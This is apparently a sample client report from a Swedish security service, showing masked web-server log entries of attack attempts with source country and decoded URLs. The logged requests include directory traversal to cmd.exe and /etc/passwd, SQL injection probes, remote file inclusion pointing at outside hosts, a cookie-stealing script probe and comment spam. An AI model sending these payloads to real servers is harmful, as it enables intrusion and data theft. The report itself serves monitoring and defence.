Eftersom denna rapport innehåller avidentifierad data visas inga
loggrader från skarpa loggfiler.
Exempel på hur det kan se ut i en klientrapport (ip-nummer är maskade):
---- 2007-05-23 14:06:42 ----
Källa: XXX.XXX.XXX.XXX
Land: DE (Tyskland)
Loggrad: XXX.XXX.XXX.XXX - - [23/May/2008:14:06:42 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 199 "-" "-"
Avkodad URL: GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
---- 2007-05-23 14:06:41 ----
Källa: XXX.XXX.XXX.XXX
Land: DE (Tyskland)
Loggrad: XXX.XXX.XXX.XXX - - [23/May/2008:14:06:41 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 10625 "-" "-"
Avkodad URL: GET /MSADC/root.exe?/c dir
---- 2007-02-24 20:49:54 ----
Källa: XXX.XXX.XXX.XXX
Land: CN (Kina)
Loggrad: 2007-02-24 20:49:54 XXX.XXX.XXX.XXX - - - XXX.XXX.XXX.XXX 80 GET /Default.asp Sectionid=&Itemid=&Languageid=EN`%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20`%25`=` 200 0 12701 226 31 HTTP/1.1 Internet+Explorer+6.0 ASPSESSIONIDQQAQDSSD=DHLHAJAAGPIHJGDOJMIMKGPA -
Avkodad URL: GET /Default.asp Sectionid=&Itemid=&Languageid=EN` and char(124)+user+char(124)=0 and `%`=`
---- 2007-02-24 20:56:58 ----
Källa: XXX.XXX.XXX.XXX
Land: CN (Kina)
Loggrad: 2007-02-24 20:56:58 XXX.XXX.XXX.XXX - - - XXX.XXX.XXX.XXX 80 GET /Default.asp Sectionid=&Itemid=&Languageid=EN`%20and%201=1%20and%20``=` 200 0 12677 225 31 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDQQAQDSSD=KJLHAJAAEDPLLHAJJGNBFIDJ -
Avkodad URL: GET /Default.asp Sectionid=&Itemid=&Languageid=EN` and 1=1 and ``=`
---- 2007-02-24 23:52:15 ----
Källa: XXX.XXX.XXX.XXX
Land: US (Amerikas Förenta Stater)
Loggrad: 2007-02-24 23:52:15 XXX.XXX.XXX.XXX - - - XXX.XXX.XXX.XXX 80 GET /articles/ sIncPath=http://210.0.141.247/~test5/c.in??/ 404 2 - - - - Morfeus+Fucking+Scanner - -
Avkodad URL: GET /articles/ sIncPath=http://210.0.141.247/~test5/c.in??/
---- 2009-02-02 11:57:40 ----
Källa: XXX.XXX.XXX.XXX
Land: GB (United Kingdom)
Loggrad: 2009-02-02 11:57:40 W3SVC4 - XXX.XXX.XXX.XXX GET /sv/Sok/ quicksearchquery=Could+you+imagine+how+horrible+things+would+be+if+we+always+told+others+how+we+felt%3f+Life+would+be+intolerably+bearable.%0d%0a%5burl%3dhttp%3a%2f%2fwww.geocities.com%2fhdtvvidio2%2fhdtv.html%5d+does+msn+mail+have+a+mailbox+limit+%5b%2furl%5d%5burl%3dhttp%3a%2f%2fwww.geocities.com%2fhdtvvidio2%2findex.html%5d+how+to+copy+youtube+videos+%5b%2furl%5d%5burl%3dhttp%3a%2f%2fwww.geocities.com%2fyoutubeitlite%2findex.html%5d+foo+fighters+logo+myspace+2.0+layouts+%5b%2furl%5d%5burl%3dhttp%3a%2f%2fwww.geocities.com%2fmyspaceu2new%2findex2.html%5d+myspace+profiles+with++sexy+videos+%5b%2furl%5d%0d%0a%3ca+href%3dhttp%3a%2f%2fwww.geocities.com%2fyoutubeitlite%2findex.html+%3efoo+fighters+logo+myspace+2.0+layouts%3c%2fa%3e%3ca+href%3dhttp%3a%2f%2fwww.geocities.com%2fmyspaceu2new%2findex2.html+%3emyspace+profiles+with++sexy+videos%3c%2fa%3e%3ca+href%3dhttp%3a%2f%2fwww.geocities.com%2fmyspaceu2new%2findex.html+%3esex+chat+on+msn+live+messenger%3c%2fa%3e 80 - 85.12.64.149 - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - - - 200 0 3 - - -
Avkodad URL: GET /sv/Sok/ quicksearchquery=Could you imagine how horrible things would be if we always told others how we felt? Life would be intolerably bearable.[CR][LF][url=http://www.geocities.com/hdtvvidio2/hdtv.html] does msn mail have a mailbox limit [/url][url=http://www.geocities.com/hdtvvidio2/index.html] how to copy youtube videos [/url][url=http://www.geocities.com/youtubeitlite/index.html] foo fighters logo myspace 2.0 layouts [/url][url=http://www.geocities.com/myspaceu2new/index2.html] myspace profiles with sexy videos [/url][CR][LF]foo fighters logo myspace 2.0 layoutsmyspace profiles with sexy videossex chat on msn live messenger
---- 2009-01-26 05:36:56 ----
Källa: XXX.XXX.XXX.XXX
Land: RU (Russia)
Loggrad: XXX.XXX.XXX.XXX - - [26/Jan/2009:05:36:56 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-" "-"
Avkodad URL: GET /w00tw00t.at.ISC.SANS.DFind:)
---- 2008-12-09 09:24:51 ----
Källa: XXX.XXX.XXX.XXX
Land: CN (China)
Loggrad: XXX.XXX.XXX.XXX - - [09/Dec/2008:09:24:51 +0000] "GET /sarbarheter/sr/sr07-032-trend-micro-serverprotect-ett-flertal-sarbarheter/?searchterm=none`%20and%20user%3E0%20and%20``=` HTTP/1.1" 200 18136 "-" "-"
Avkodad URL: GET /sarbarheter/sr/sr07-032-trend-micro-serverprotect-ett-flertal-sarbarheter/?searchterm=none` and user>0 and ``=`
---- 2009-02-02 03:11:41 ----
Källa: XXX.XXX.XXX.XXX
Land: KR (South Korea)
Loggrad: XXX.XXX.XXX.XXX - - [02/Feb/2009:03:11:41 +0000] "GET //index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idz.txt?? HTTP/1.1" 404 10702 "-" "libwww-perl/5.803"
Avkodad URL: GET //index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idz.txt??
---- 2009-02-06 22:11:30 ----
Källa: XXX.XXX.XXX.XXX
Land: US (United States)
Loggrad: 2009-02-06 22:11:30 W3SVC4 - XXX.XXX.XXX.XXX CONNECT / - 80 - 63.253.135.173 - - - - - 501 0 0 - - -
Avkodad URL: CONNECT /
---- 2009-02-05 16:07:45 ----
Källa: XXX.XXX.XXX.XXX
Land: SE (Sweden)
Loggrad: 2009-02-05 16:07:45 W3SVC1 - XXX.XXX.XXX.XXX TRACE /cuq0zpqz.html - 80 - XXX.XXX.XXX.XXX - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - - - 501 0 0 - - -
Avkodad URL: TRACE /cuq0zpqz.html
---- 2009-02-05 16:07:29 ----
Källa: XXX.XXX.XXX.XXX
Land: SE (Sweden)
Loggrad: 2009-02-05 16:07:29 W3SVC1 - XXX.XXX.XXX.XXX GET /launch.jsp NFuse_Application=>alert(document.cookie); 80 - XXX.XXX.XXX.XXX - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - - - 404 0 2 - - -
Avkodad URL: GET /launch.jsp NFuse_Application=>alert(document.cookie);
---- 2009-02-05 16:07:00 ----
Källa: XXX.XXX.XXX.XXX
Land: SE (Sweden)
Loggrad: 2009-02-05 16:07:00 W3SVC1 - XXX.XXX.XXX.XXX GET /Diary/source v=../../../../../../../../../../etc/passwd%00 80 - XXX.XXX.XXX.XXX - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - - - 404 0 2 - - -
Avkodad URL: GET /Diary/source v=../../../../../../../../../../etc/passwd